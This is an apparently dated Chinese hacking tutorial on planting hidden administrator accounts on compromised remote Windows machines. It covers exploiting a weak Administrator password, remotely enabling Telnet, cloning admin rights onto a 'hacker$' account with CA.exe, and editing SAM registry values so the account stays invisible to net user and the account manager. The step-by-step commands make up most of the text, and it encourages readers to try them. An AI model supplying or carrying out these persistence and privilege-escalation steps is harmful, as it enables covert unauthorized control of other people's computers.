创建隐藏用户

一、利用帐户克隆工具来创建
       Clone Administrator（CA.exe），利用这个工具可以将Administrator的帐号克隆为一个指定的普通帐号（此普通帐号必须已经存在）。克隆得到的帐号具有和系统内置的Administrator同样的设置，并且用NET命令或者用户管理器也发现不了其权限已经被提升，是一个不错的ROOT KIT。
     现在，我们就来看看如何利用帐户克隆工具在肉鸡上创建隐藏的超级用户。
     利用流光、SuperScan等进行扫描，假设已经扫描到一远程主机的Administrator帐户，其密码为123。我们可以使用DameWare Mini Remote Control（简称DMRC），在图形界面（GUI）中来远程控制远程主机。也可以使用OpenTelnet.exe工具来开启远程主机的TELNET服务，其命令格式为：OpenTelnet.exe \\server username password NTLMAuthor telnetport，使用命令：opentelnet \\192.XX.XX.2 Administrator "123" 0 99，呵呵，没想这么成功容易就开启肉鸡的TELNET吧！接着使用命令：Telnet 192.XX.XX.2 99，输入帐户及密码，成功获取一SHELL。

    首先想办法查看一下有哪些用户被细心的管理员禁止，一般情况下，有些管理员出于安全考虑，通常会将guest禁用，当然也会禁用其他用户。在图形界面下，非常容易识别，只要在帐户管理器中就可以看到被禁用的帐户上有一个红叉。但在命令行状态下，只能使用命令：“net user 用户名”一个一个来查看用户是否被禁用。如果懒得这样麻烦，可自行建立一个新的帐户，命令为：“Net user hacker$ youkou /add”，然后使用命令：“Net user hacker$ /active:no”来停用此帐户。

     断开与远程主机的连接，用小榕的超级用户克隆程序CA.exe，将被禁用的用户hacker$克隆成超级用户，命令为：CA.EXE \\192.XX.XX.2 Administrator 123 hacker$ youkou，成功！

   这时，hacker$就成为了超级用户，并有具有和Administrator同样的设置(桌面、菜单等等）。但还是得检查一下，用CCA.exe，命令如下：cca \\192.XX.XX.2 administrator 123。

 

    看到这一行返回信息没有？“[hacker$] AS SAME AS [Administrator]”，说明hacker$帐户和Administrator相同，克隆成功。
二、图形界面建隐藏超级用户
     恐怕我们最熟悉的就是在图形界面下进行操作了，这对于在本地计算机、3389终端服务肉鸡或使用DMRC等控制的肉鸡上创建隐藏超级用户 再好不过了。
     大家知道吗？Windows 2000中有两个注册表编辑器：Regedit.exe和Regedt32.exe，Windows XP中Regedit.exe和Regedt32.exe实为一个程序，修改键值的权限时在右键快捷菜单中选择“权限”来修改。对Regedit.exe我想大家都很熟悉，但却不能对注册表的键进行权限设置，而Regedt32.exe最大的优点就是能够对注册表的项键设置权限。Windows NT/2000/XP的帐户信息都在注册表的HKEY_LOCAL_MACHINE\SAM\SAM键下，但是除了系统用户SYSTEM外，其他用户都没有权限查看到其中的信息，因此首先得用Regedt32.exe对“HKEY_LOCAL_MACHINE\SAM\SAM”键设置为“完全控制”权限。这样就可以对SAM键内的信息进行读写操作。
     首先在肉鸡中创建一个新的帐户hacker$，可以在帐户管理器中建立，也可以使用命令：net user hacker$ 123 /add 来创建。然后通过“开始”菜单中的“运行”，输入regedt32.exe，点击“确定”后就打开了注册表编辑器。依次展开子键HKEY_LOCAL_MACHINE\SAM\SAM，用鼠标右键单击，在弹出的快捷菜单中选择“权限”项。

    在出现的“SAM 权限”对话窗口中，点击“添加”将我登录时的帐户添加到“组或用户名称”列表中，这里我是以administrator的身份登录的，所以我就将administrator加入，在下部的权限功能区设置权限为“完全控制”。

    小提示：最好是添加你登录的帐户或帐户所在的组，切莫修改原有的帐户或组，否则将会带来一系列不必要的问题。等隐藏超级用户建好以后，再来这里将你添加的帐户删除即可。
     如果还是不能展开子键，请关闭后重新打开，如果是Windows 2000的机器，请关闭这个注册表编辑器，重新打开“regedit.exe”。展开子键：HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\hacker$，在其右侧窗口中发现其默认值为0x3F1。

 

     下面将hacker$键、hacker$对应的项000003F1以及administrator所对应的项000001F4导出为hacker.reg、3EE.reg和1f4.reg，退出注册表编辑器。用记事本分别打开这几个导出的文件进行编辑，将超级用户对应的项000001F4下的键“F”的值复制，并覆盖hacker$对应的项000003EE下的键“F”的值，然后将hacker.reg和3EE.reg合并为hacker.reg。 接下来在命令行下执行net user hacker$ /del将用户hacker$删除，最后再将hacker.reg导入注册表即可。
     现在，隐藏的超级用户hacker$已经建好了。打开regedt32.exe，把HKEY_LOCAL_MACHINE\SAM\SAM键权限改回原来的样子（只要删除添加的帐户administrator即可）。
    注意：隐藏的超级用户建好后，就能在帐户管理器看不到hacker$这个用户，在命令行用“net user”命令也看不到，但是超级用户建立以后，就不能再改密码了，如果用net user命令来改hacker$的密码的话，那么在帐户管理器中将又会看这个隐藏的超级用户了，而且不能删除。
三、命令行建立隐藏超级用户
     首先通过使用OpenTelnet.exe工具来开启远程主机的TELNET服务，然后TELNET远程登陆得到一个shell，创建一个新的帐户，命令为：
net user hacker$ youkou /add，然后就来导出注册表项HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users，运行命令：
regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\，其中/e 是regedit.exe的参数，在HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users这个键的一定要以“\”结尾。

     断开TELNET连接，建立IPC会话：net use \\192.XX.XX.2\ipc$ "123" /user:"administrator，然后将肉鸡上的hacker.reg下载到本机上用记事本打开进行编辑命令为：copy \\192.XX.XX.2\D$\hacker.reg，用记事本编辑，将超级用户对应的项000001F4下的键“F”的值复制，并覆盖hacker$对应的项000003EE下的键“F”的值（hacker$对应的项在不同的机器而不同），编辑好后再上传：copy hacker.reg \\192.XX.XX.2\D$\hacker1.reg 。
     再TELNET到远程主机，使用命令net user hacker$ /del删除hacker$帐户，然后把hacker.reg导入，命令为：regedit.exe /s hacker.reg，其中参数/s表示以安静模式导入。这样就成功创建了一个隐藏的超级用户。
四、连接远程肉鸡注册表创建

     还有一个比较简单方便的办法，就是通过控制台以及注册表编辑器“文件”菜单中的“连接网络注册表”功能来完成隐藏超级用户的创建。
    通过“开始”菜单中的“运行”，输入MMC，回车后即打开了控制台，打开“文件”菜单中的“添加/删除管理单元”（快捷键CTRL+M），在出现的对话框中点击“添加”按钮，在出现的“添加独立管理单元”对话框中的列表中选择“本地用户和组”。

     单击“添加”即弹出“选择目标机器”对话框，选中“另一台计算机”，在其后输入远程计算机的IP地址，点击“完成”。

    一路关闭返回至控制台窗口，我们就可对远程计算机进行组和用户的管理了，在右侧窗口空白处右击，在弹出的快捷选择“新用户”建立一帐户hacker$吧！
     我们知道，regedit.exe、regedt32.exe都有连接网络注册表的功能，我们可以用regedt32.exe来为远程主机的注册表项设置权限，用regedit.exe来编辑远程注册表。导出相应注册项，然后进行编辑修改（同上面介绍相似）。

    现在在“控制台”中删除刚建立的帐户hacker$，然后关闭。然后在注册表编辑器中通过“文件”菜单中的“导入”功能将上面导出的文件导入即可。
     如果远程主机没有开启远程注册表服务，请自行开启，因为你一开始就已经拥有其管理员帐户密码。
五、需注意的几点事项
     1、隐藏的超级用户建立以后，在帐户管理器中和命令行下均看不到这个用户，但这个用户却存在。
     2、隐藏的超级用户建立以后，就不能再修改密码了，因为一旦修改密码，这个隐藏的超级用户就会暴露在帐户管理器中，而且不能删除。
     3、如在本机上创建隐藏的超级用户时，最好用系统自带的备份工具先备份好注册表。
     想不想在电脑上大显身手？自己动手试一试吧！